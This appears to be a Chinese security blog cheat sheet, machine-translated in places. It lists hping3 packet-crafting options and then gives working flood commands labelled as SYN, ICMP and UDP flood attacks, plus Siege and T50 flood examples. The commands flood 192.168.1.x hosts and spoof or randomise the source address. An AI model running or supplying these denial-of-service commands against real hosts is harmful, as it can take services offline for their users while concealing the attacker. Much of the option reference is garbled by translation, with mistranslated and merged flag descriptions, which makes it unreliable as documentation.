hping3
幾乎可以定制發送任何TCP/IP數據包,用於測試FW,端口掃描,性能測試
-c - 計數包計數
-i - interval wait(uX表示X微秒,例如-i u1000)
- -i u10000的快速別名(第二個10個數據包)
- -i u1000的快速別名(第二個100個數據包)
--flood盡可能快地發送數據包。不要顯示回復。
-n - 數字數字輸出
-q - 安靜
-I - 接口接口名稱(否則為默認路由接口)
-V - verbose verbose模式
-D - 調試調試信息
-z - 綁定ctrl + z到ttl(默認為dst端口)
-Z - unbind unbind ctrl + z - 為收到的每個匹配數據包發出蜂鳴聲
模式
默認模式TCP
-0 - RAIP RAW IP模式
-1 - icmp ICMP模式
-2 - 表示UDP模式
-8 - 掃描SCAN模式。示例:hping --scan 1-30,70-90 -S www.target.host
-9 - 聽聽模式
IP
-a - 欺騙欺騙源地址
--rand-dest隨機destionation地址模式。看到那個男人。
--rand-source隨機源地址模式。看到那個男人。
-t --ttl ttl(默認64)
-N - id id(默認隨機)
-W --winid使用win * id字節排序
-r --rel相對化id字段(估計主機流量)
-f --frag分割更多碎片的數據包。 (可以通過弱acl)
-x --morefrag設置更多片段標志
-y --dontfrag set不分片標志
-g --fragoff設置片段偏移量
-m --mtu設置虛擬mtu,暗示--frag如果數據包大小> mtu
-o --tos服務類型(默認為0x00),嘗試--tos幫助
-G --rroute包含RECORD_ROUTE選項並顯示路由緩沖區
--lsrr松散的源路由和記錄路由
--ssrr嚴格的源路由和記錄路由
-H --ipproto僅在RAW IP模式下設置IP協議字段
ICMP
-C --icmptype icmp type(默認回顯請求)
-K - icmpcode icmp code(默認為0)
--force-icmp發送所有icmp類型(默認發送僅支持的類型)
--icmp-gw設置ICMP重定向的網關地址(默認為0.0.0.0)
--icmp-ts別名為--icmp --icmptype 13(ICMP時間戳)
--icmp-addr別名為--icmp --icmptype 17(ICMP地址子網掩碼)
--icmp-help顯示其他icmp選項的幫助
UDP / TCP
-s --baseport基本源端口(默認隨機)
-P --destport [+] [+] <port>目標端口(默認為0)ctrl + z inc / dec
-k - 保持靜止源端口
-w --win winsize(默認64)
-O --tcpoff設置假tcp數據偏移量(而不是tcphdrlen / 4)
-Q --seqnum僅顯示tcp序列號
-b --badcksum(嘗試)發送具有錯誤IP校驗和的數據包
許多系統將修復發送數據包的IP校驗和
所以你會得到錯誤的UDP / TCP校驗和。
-M --setseq設置TCP序列號
-L --setack設置TCP確認
-F --fin設置FIN標志
-S --syn設置SYN標志
-R - 首先設置RST標志
-P --push設置PUSH標志
-A --ack設置ACK標志
-U - 設置URG標志
-X --xmas設置X未使用標志(0x40)
-Y --ymas設置Y未使用標志(0x80)
--tcpexitcode使用最后的tcp-> th_flags作為退出代碼
--tcp-mss啟用具有給定值的TCP MSS選項
--tcp-timestamp啟用TCP時間戳選項以猜測HZ /正常運行時間
同項
-d - 數據數據大小(默認為0)
-E - 文件中的文件數據
-e --sign添加'簽名'
-j --dump以十六進制轉儲數據包
-J --print轉儲可打印字符
-B --safe啟用“安全”協議
-u --end告訴你--file何時達到EOF並防止倒帶
-T --traceroute traceroute mode(暗示--bind和--ttl 1)
--tr-stop在traceroute模式下收到第一個非ICMP時退出
--tr-keep-ttl保持源TTL固定,僅用於監視一跳
--tr-no-rtt不要在traceroute模式下計算/顯示RTT信息,ARS包描述(新的,不穩定的)
--apd-send發送APD描述的數據包
syn flood攻擊
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.12
hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.12
hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.12
icmp flood攻擊
hping3 -q -n -a 192.168.1.12 --icmp -d 56 --flood 192.168.1.10
udp flood攻擊
hping3 -a 192.168.1.12 --udp -s 53 -d 100 -p 53 --flood 192.168.1.10
Siege:http/https壓力測試工具,模擬多個用戶並發訪問請求
siege -g http://192.168.1.12/xxsec.php / 192.168.1.12
T50
t50 192.168.1.12 --flood --turbo -S --protocol TCP --dport 80
t50 192.168.1.12 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22
友情鏈接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn